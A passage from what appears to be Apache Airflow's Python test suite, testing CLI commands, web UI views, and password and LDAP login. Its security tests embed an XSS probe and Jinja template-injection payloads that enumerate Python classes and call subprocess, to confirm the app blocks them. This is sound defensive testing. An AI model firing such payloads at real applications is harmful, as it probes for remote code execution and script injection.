"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator',
'-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as f:
json.dump(pool_config_input, f)
# Import json
try:
cli.pool(self.parser.parse_args(['pool', '-i', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool -i pools_import.json' failed: %s" % e)
# Export json
try:
cli.pool(self.parser.parse_args(['pool', '-e', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool -e pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as f:
pool_config_output = json.load(f)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except Exception:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except Exception:
# exception is expected here since dag doesnt exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run,
# and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=missing_dag',
follow_redirects=True)
self.assertIn("seems to be missing", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=section-1-task-1&"
"dag_id=example_subdag_operator.section-1&future=false&past=false&"
"upstream=false&downstream=true&recursive=true&"
"execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.end",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1.section-1-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-3",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-4",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-5",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.some-other-task",
response.data.decode('utf-8'))
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_partial(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_functool_partial&dag_id=test_task_view_type_check&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("A function with two args", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_instance(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_instance&dag_id=test_task_view_type_check&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("A __call__ method", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=EXAMPLE_DAG_DEFAULT_DATE,
end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class PasswordUserTest(unittest.TestCase):
def setUp(self):
user = models.User()
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user = PasswordUser(user)
self.password_user.username = "password_test"
@mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash')
def test_password_setter(self, mock_gen_pass_hash):
mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass"
self.password_user.password = "secure_password"
mock_gen_pass_hash.assert_called_with("secure_password", 12)
def test_password_unicode(self):
# In python2.7 no conversion is required back to str
# In python >= 3 the method must convert from bytes to str
self.password_user.password = "secure_password"
self.assertIsInstance(self.password_user.password, str)
def test_password_user_authenticate(self):
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_unicode_user_authenticate(self):
self.password_user.username = u"🐼" # This is a panda
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_authenticate_session(self):
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user.password = 'test_password'
session = Session()
session.add(self.password_user)
session.commit()
query_user = session.query(PasswordUser).filter_by(
username=self.password_user.username).first()
self.assertTrue(query_user.authenticate('test_password'))
session.query(models.User).delete()
session.commit()
session.close()
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except Exception:
pass
configuration.conf.set("ldap", "uri", "ldap://openldap:389")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except Exception:
pass
configuration.conf.set("ldap", "uri", "ldap://openldap:389")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
